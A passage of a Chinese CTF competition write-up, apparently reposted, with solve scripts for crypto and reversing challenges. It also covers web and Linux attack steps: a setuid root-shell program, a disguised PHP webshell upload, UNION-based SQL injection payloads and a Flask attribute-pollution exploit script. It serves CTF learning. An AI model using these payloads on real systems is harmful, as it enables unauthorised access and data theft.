1378147180, 1961149024, 2557044426, 3079500155, 1278712539, 2437075468, 4079403208, 1424357113, 1460980393, 1869711134, 739995379, 236457792, 56725573, 1192143182, 3480051881, 1940191085, 2145576244, 277256288, 1350391298, 927908951, 234611527, 1270659504, 2800736156, 2377033778, 379042674, 268642839, 254414386, 3717739293, 3742427571, 2062173352, 1468838866, 3248800238, 3810334297, 1774562996, 3243508531, 768385892, 3663776790, 3561471474, 2072506584, 4072612194, 4145385651, 1568151342, 413061947, 2606711318, 787242867, 358259431, 3250866366, 496471679, 3974003161, 3962245443, 3448346690, 3918858426, 1545049592, 4098252582, 4272944055, 2709981394]
n2 = 114667370859267713459979739172691665204879151133165169917752071845350748196947769536460950730177555853607685665148468694999487984430241339705779225600425842398781387739352517522092529671186262329583850232443458354943390042125768975735770226662059908491110663467968924345474794260851510527271024718213859872091
c = 254437839234710932548963084800696912447199841209292016504026652383142017227876963989808065988983617626350151358444895183944611290313513729505521630711812174923796964838915751672967332321515720258149777206328112312514688748335753179198631177743199829645308091442800427146012476434191025450662950787631144984158609948536064605299987908223963902731920237033619141863042816600729594847568654431928343565350409273886054122366132475796004834811862120850908513978375240E_FACT = {2:2, 109:1, 257:1, 11579:1}def one_e_th_root_mod_p(p, e, c):k = p - 1e_c = 1for prime, exp in E_FACT.items():if k % prime != 0:e_c *= pow(prime, exp)y = pow(c % p, pow(e_c, -1, k), p)cand = {y}for _ in range(E_FACT.get(2, 0)):new = set()for z in cand:r1, r2 = tonelli(z, p)new.add(r1); new.add(r2)cand = newk_cur = kfor _ in range(E_FACT.get(2, 0)): k_cur //= 2for prime, exp in E_FACT.items():if prime == 2 or k % prime == 0 and exp:if prime == 2: continuefor _ in range(exp):inv = pow(prime, -1, k_cur // prime)cand = {pow(z, inv, p) for z in cand}k_cur //= primereturn list(cand)outputs_624 = LIST1 + LIST2
e_pred = predict_next_32bit(outputs_624)
print("[+] e =", e_pred)q = gcd(n1, n2); p = n1 // q; r = n2 // q; N = p*q*rroots_p = one_e_th_root_mod_p(p, e_pred, c)
roots_q = one_e_th_root_mod_p(q, e_pred, c)
roots_r = one_e_th_root_mod_p(r, e_pred, c)def all_crt_roots():for rp in roots_p:for rq in roots_q:for rr in roots_r:yield crt_all([rp, rq, rr], [p, q, r])[0]base = list(all_crt_roots())d_p, d_q, d_r = gcd(e_pred, p-1), gcd(e_pred, q-1), gcd(e_pred, r-1)
g_p = generator_of_exact_order(p, d_p)
g_q = generator_of_exact_order(q, d_q)
g_r = generator_of_exact_order(r, d_r)ans = None
seen = set()
for m0 in base:for i in range(d_p):k0 = pow(g_p, i, p)for j in range(d_q):k1 = pow(g_q, j, q)for k2 in range(d_r):k2v = pow(g_r, k2, r)K, _ = crt_all([k0, k1, k2v], [p, q, r])m = (m0 * K) % Nif m in seen: continueseen.add(m)b = long_to_bytes(m)if b.startswith(b"flag{") or b.startswith(b"FLAG{") or b.startswith(b"ctf{"):ans = bbreakif ans: breakif ans: breakif ans: breakprint("[+] flag =", ans)"""
[+] e = 1297450108
[+] flag = b'flag{wwooooow_u_no_the_randdoooooo0m!!!}'
"""

misc

《关于我穿越到CTF的异世界这档事:破》

题目描述：

metavi穿过第一层的光之门，眼前是一片由无数黑色石柱组成的荒原。石柱表面闪烁着绿色的字符流，仿佛是某种古老的系统在运转。
石柱的底层写着：用户：ctf，密码：CtfP@ssw0rd!2025
看完这一行之后，脚下的大地裂开，露出一座巨大的“终端祭坛”。祭坛上浮现出一行行命令，却被层层权限屏障所阻挡。 要想突破这一关，metavi必须找到隐藏在系统中的漏洞，逐步提升权限，直至掌控整个祭坛。
【第二层·linux提权：请ssh连接提权，找到祭坛深处的flag。】

ssh远程连接，找到提示是linux的SUID提权

查找所有SUID权限的文件：

find / -type f -perm -4000 2>/dev/null

第一个进程像是一个自定义的程序，先对其进行检查

发现有GCC编译，编译一段

#include <unistd.h>
int main() {setuid(0); setgid(0);execl("/bin/sh","sh","-p",NULL);return 0;
}

成功提权了,查找flag存放位置

find / -name 'flag*' 2>/dev/null

reverce

Pyc

die查壳

py打包程序，在线网站解包，https://pyinstxtractor-web.netlify.app/

在线网站反编译，https://www.lddgo.net/string/pyc-compile-decompile

# uncompyle6 version 3.9.2
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.6.12 (default, Feb  9 2021, 09:19:15) 
# [GCC 8.3.0]
# Embedded file name: pyc.py
print("Ciallo~")
print("Plz input your flag~")
flag = input()
flag_list = list(flag)
for i in range(len(flag_list)):a = flag_list[i]if "a" <= a <= "z":a = ord(a)a = (a - 12) * 2 + 6else:if "A" <= a <= "Z":a = ord(a)a = (a + 6) * 3 + 9else:a = ord(a)a = a + 11flag_list[i] = chr(a)
else:flag = "".join(flag_list)hex_flag = ",".join([hex(ord(c)) for c in flag])data = "0xba,0xc6,0xb0,0xbc,0x86,0x10b,0x126,0xe4,0x6a,0xc0,0x40,0x6a,0xda,0x3f,0xd2,0xe0,0x6a,0xb8,0x3f,0xd4,0xe0,0x89,0x88"if data != hex_flag:print("wrong~")else:print("great~")

exp:

data = "0xba,0xc6,0xb0,0xbc,0x86,0x10b,0x126,0xe4,0x6a,0xc0,0x40,0x6a,0xda,0x3f,0xd2,0xe0,0x6a,0xb8,0x3f,0xd4,0xe0,0x89,0x88"
hex_list = data.split(",")
enc_nums = [int(x, 16) for x in hex_list]flag = []
for e in enc_nums:if (e + 18) % 2 == 0:p = (e + 18) // 2if ord('a') <= p <= ord('z'):flag.append(chr(p))continueif (e - 27) % 3 == 0:p = (e - 27) // 3if ord('A') <= p <= ord('Z'):flag.append(chr(p))continuep = e - 11flag.append(chr(p))print( "".join(flag))"""
flag{PYC_i5_v4ry_e4sy~}
"""

UPX

题目描述：

这应该是道手脱题。。。

die查壳

UPX脱壳，发现报错

010查看，是魔改壳

能发现部分16进制值为（2E 2E 2E 2E）,进行修改

成功脱壳

ida分析程序，查看main函数

算法逻辑很直接了

exp:

def decrypt(enc: str) -> str:res = []for i, ch in enumerate(enc):if 'A' <= ch <= 'Z':p = chr((ord(ch) - 65 - i) % 26 + 65)elif 'a' <= ch <= 'z':p = chr((ord(ch) - 97 + i) % 26 + 97)else:p = chres.append(p)if ch == '}':breakreturn ''.join(res)if __name__ == "__main__":enc = "fkyd{YNek_SD_AB@ars_OKT}"flag = decrypt(enc)print(flag)"""
flag{THls_IS_NN@qik_UPX}
"""

base

题目描述：

base家族小合集

die查壳，没壳

ida进行分析

注释中有一串base58编码的字符串：

2wvnsjrESxyfytuhEwqChbLLZRtA4VLhf5HgrKNRR3jYZGgyd1XHEhypTQ8b546txjJx7wHgJaJw2mBxbDtS8dCS

解密后：

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/

这像是base64自定义换表

密文就应该是：

zMXHz3TuBdrPC18XB0bZzx0=

exp:

import base64str1 = "zMXHz3TuBdrPC18XB0bZzx0="
string1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
print (base64.b64decode(str1.translate(str.maketrans(string1,string2))))"""
b'flag{Tl4is_1o@se}'
"""

rc4

题目描述：

你知道吗，rc4有几种解法

die查壳，没壳

ida进行分析，找main函数

发现key：ohhhRC4，题目是rc4，那这应该就是rc4的密钥咯
还有加密密文

分析rc4_init\rc4_crypt,发现这不是标准的rc4加密

多了一步按字节序号 k 的异或

exp:

import structdef rc4_init(key: bytes):S = list(range(256))k = [key[i % len(key)] for i in range(256)]j = 0for i in range(256):j = (k[i] + S[i] + j) & 0xFFS[i], S[j] = S[j], S[i]return Sdef rc4_crypt(S_init, data: bytes) -> bytes:S = S_init[:]i = 0j = 0out = bytearray()for idx, b in enumerate(data):i = (i + 1) & 0xFFj = (S[i] + j) & 0xFFS[i], S[j] = S[j], S[i]ks = idx ^ S[(S[i] + S[j]) & 0xFF]out.append(b ^ ks)return bytes(out)buf = bytearray(27)
buf[0:8]   = struct.pack('<Q', 0xD6DB345DC17A5FF7)
buf[8:16]  = struct.pack('<Q', 0x68DAE1DE2D75D82F)
buf[16:24] = struct.pack('<Q', 0xF907EACE4A9B57E0)
buf[23:27] = struct.pack('<I', 1585012473)cipher = bytes(buf)
key = b"ohhhRC4"S = rc4_init(key)
plain = rc4_crypt(S, cipher)print( plain.decode())"""
flag{S0NNE_Rc4_l$_c13@nged}
"""

web

Only Picture Up

题目描述：

咦？上传一个图片就能得到flag？

进入靶场是一个文件上传的页面

看页面显示只能上传 .jpg、.jpeg、.png 或 .gif 结尾的文件

那就先传一个png图片，抓包传马

上传成功了，改后缀为php

上传失败了，不是前端校验，那可能是Content-Type校验了

重新上传一个php文件，将后缀名改为jpg

找到图片路径

上传成功，蚁剑连接

根目录找到flag文件

留言板

题目描述：

jinjia2牌留言板，来说点什么吧~

看题目描述感觉就是ssti的jinjia2模板注入了

进入页面

输入{{7*7}}，已经很明显了，ssti

post传参，参数是message，fenjing一把梭了

登录和查询

题目描述：

这么简单的登录和查询界面，应该是漏洞百出的吧～提示：本题只需要少于100次的爆破，快速大量爆破可能导致意外被平台拦截流量（不是题目问题）。

web-week2-ezsql明显是考sql注入

进入靶场，是一个登录页面

源码中发现账号admin和一个密码本

下载密码本进行爆破

找到密码：admin123

登录账号

既然是sql注入，那可以试试有没有get传参参数，发现id=2时，页面回显改变

先确定回显位

-1' UNION SELECT 1,2,3#

回显位为2

查数据库名

-1'UNION SELECT 1,database(),3#

数据库名是：ctf

查表名

-1 union select 1,group_concat(table_name), 3, from information_schema.tables where table_schema="ctf"

回显说：未找到记录！真正的 flag 可能在名为 flags 的表中吗（暂时确定表是flags）

查列名

-1 UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_schema="ctf" AND table_name="flags"#

还是同样的回显

那就直接查flags表中的flag

-1' UNION SELECT 1, group_concat(flag), 3 FROM ctf.flags#

这是什么函数

题目描述：

没见过？搜一下！在/flag

进入页面

python/flask读取文件原型链污染

exp:

import requestsbase_url = "http://challenge.ilovectf.cn:30204/"json_data = {"__class__" : {"__init__" : {"__globals__" : {"app": {"static_folder": "/proc/1/root"}}}}
}requests.post(base_url, json=json_data)req = requests.get(base_url + "static/flag")
print(req.text)"""
flag{45969db3-2583-46cb-866e-04b8e09c6d46}
"""

参考：

https://www.cnblogs.com/yatq/p/19146883

https://normalsubgroup.cauchy.top/blog/game0x2025w1/

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/940888.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！